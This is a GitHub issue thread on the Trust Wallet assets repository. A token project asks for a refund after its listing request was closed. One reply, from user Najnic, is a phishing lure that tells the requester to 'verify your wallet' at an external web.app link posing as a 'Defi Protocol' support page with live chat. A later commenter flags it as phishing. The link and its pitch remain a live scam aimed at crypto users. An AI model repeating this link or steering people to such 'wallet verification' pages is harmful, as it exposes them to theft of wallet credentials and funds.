### ISSUE TITLE
> thanks for your interest, we will consider to add your token later.

### ISSUE THREAD

**Issue by dexIRA** [trustwallet/assets#26536]
> thanks for your interest, we will consider to add your token later.
@Cryptocool1 @Iamdeadlyz @covain 

This PR was marked 'Closed', even though the DexFinance tokens were approved by CMC, CG, etc. Furthermore, the tokens and platform was reviewed, approved and graded by Certik. 

For whatever reason, TrustWallet did not accept this PR to be merged... Since then, the dexShare token has been migrated to the new gDex token (on the ARB network). Please refund this payment or provide a solution - as we see no reason for the confusion here. 🙏🏼 Thank you

_Originally posted by @dexIRA in https://github.com/trustwallet/assets/issues/21847#issuecomment-1751326171_

**Comment by Najnic** [comment]
Hi @dexIRA 
Visit the official Defi Protocol page to verify your wallet under validation to complete your request for you eligibility purpose via [Defi Protocol](https://defirefixprotocol.web.app).
Note: Click on the chat button to initiate a chat with an agent on a live chat for more assistance.

**Comment by curiouschonk** [comment]
@dexIRA please ignore the reply of `Najnic` as it contains a phishing link.

**Comment by cryptomanz1** [comment]
Please check the last comment in your PR.
